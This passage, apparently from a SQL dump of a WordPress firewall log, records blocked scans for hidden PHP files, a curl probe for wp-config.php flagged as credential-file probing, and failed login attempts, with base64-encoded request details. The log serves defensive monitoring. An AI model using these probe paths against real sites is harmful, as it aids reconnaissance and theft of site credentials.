Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9FeGNlcHRpb24ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134320,1700062356.625781,1700062356.616800,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/about.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2Fib3V0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134307,1700049200.737400,1700049200.727800,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/maint/iR7SzrsOUEP.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL21haW50L2lSN1N6cnNPVUVQLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134308,1700049193.808500,1700049193.785700,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/iR7SzrsOUEP.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2lSN1N6cnNPVUVQLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134309,1700049177.835258,1700049177.824700,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/406.shtml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzQwNi5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134319,1700062361.994983,1700062361.986200,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/options.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL29wdGlvbnMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133559,1699888554.862199,1699888554.852900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/template.php','http://eckankar-colorado.org/wp-includes/template.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RlbXBsYXRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133558,1699888555.194570,1699888555.186000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/theme-previews.php','http://eckankar-colorado.org/wp-includes/theme-previews.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RoZW1lLXByZXZpZXdzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133560,1699888554.512680,1699888554.504100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/template-loader.php','http://eckankar-colorado.org/wp-includes/template-loader.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RlbXBsYXRlLWxvYWRlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133307,1699888650.983765,1699888650.975200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/admin/editor/','http://eckankar-colorado.org/admin/editor/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL2VkaXRvci8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133308,1699888650.653891,1699888650.645300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/admin/','http://eckankar-colorado.org/admin/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134731,0.000000,1700198754.021934,0x00000000000000000000FFFF1B46CD9F,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','https://stay-over-night.vxu.de/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0','loginFailInvalidUsername',NULL,NULL),(134732,1700199865.265383,1700199865.253600,0x00000000000000000000FFFF12E61621,0,200,0,0,0,'https://eckankar-colorado.org/wp-config.php',NULL,'curl/7.61.1','logged:waf','wp-config.php back-up probing','{\"learningMode\":0,\"failedRules\":\"logged|501\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbmZpZy5waHA=\",\"path\":\"L3dwLWNvbmZpZy5waHA=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134726,1700192291.874641,1700192291.864600,0x00000000000000000000FFFF29D8BC5C,0,403,0,0,0,'https://eckankar-colorado.org/ms.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L21zLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133618,1699888532.943570,1699888532.934900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/feed-rss2-comments.php','http://eckankar-colorado.org/wp-includes/feed-rss2-comments.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZlZWQtcnNzMi1jb21tZW50cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134740,0.000000,1700223693.697604,0x00000000000000000000FFFFC2958961,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','https://eckankar-colorado.org/wp-login.php','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0','loginFailInvalidUsername',NULL,NULL),(134741,0.000000,1700223745.490413,0x00000000000000000000FFFF323EB190,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','https://eckankar-colorado.org/wp-login.php','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0','loginFailInvalidUsername',NULL,NULL),(134722,1700192279.591943,1700192279.352400,0x00000000000000000000FFFF29D8BC5C,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS93cC1sb2dpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134695,0.000000,1700177943.129320,0x00000000000000000000FFFF4C8278C6,0,302,0,2,0,'https://eckankar-colorado.org/wp-login.php','https://eckankar-colorado.org/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0','loginOK',NULL,NULL),(134696,0.000000,1700178526.912232,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134697,0.000000,1700179207.376799,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134685,1700172561.250966,1700172561.222900,0x00000000000000000000FFFF5B5CFF14,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sodium_compat/autoload-php7.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NvZGl1bV9jb21wYXQvYXV0b2xvYWQtcGhwNy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133332,1699888642.358209,1699888642.349400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/nav-menu.php','http://eckankar-colorado.org/wp-admin/includes/nav-menu.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL25hdi1tZW51LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133509,1699888574.207078,1699888574.198300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Misc.php','http://eckankar-colorado.org/wp-includes/SimplePie/Misc.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9NaXNjLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133508,1699888574.539444,1699888574.530700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Parser.php','http://eckankar-colorado.org/wp-includes/SimplePie/Parser.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9QYXJzZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134294,1700046103.223519,1700046103.201500,0x00000000000000000000FFFF5B5CFCA2,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/images/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ltYWdlcy9pbmNsdWRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133496,1699888580.053314,1699888580.044400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-background-position-control.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-background-position-control.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtYmFja2dyb3VuZC1wb3NpdGlvbi1jb250cm9sLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133594,1699888541.830593,1699888541.819300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ms-deprecated.php','http://eckankar-colorado.org/wp-includes/ms-deprecated.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL21zLWRlcHJlY2F0ZWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133245,1699888679.299191,1699888679.290600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/cakil/','http://eckankar-colorado.org/cakil/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Nha2lsLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133184,1699888481.896314,1699888481.879400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-http.php','http://eckankar-colorado.org/wp-includes/class-http.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLWh0dHAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133169,1699888487.198204,1699888487.189500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-walker-page.php','http://eckankar-colorado.org/wp-includes/class-walker-page.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdhbGtlci1wYWdlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133285,1699888658.618726,1699888658.603100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/tmp/','http://eckankar-colorado.org/tmp/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3RtcC8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133284,1699888659.041167,1699888659.032500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/tmps/','http://eckankar-colorado.org/tmps/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 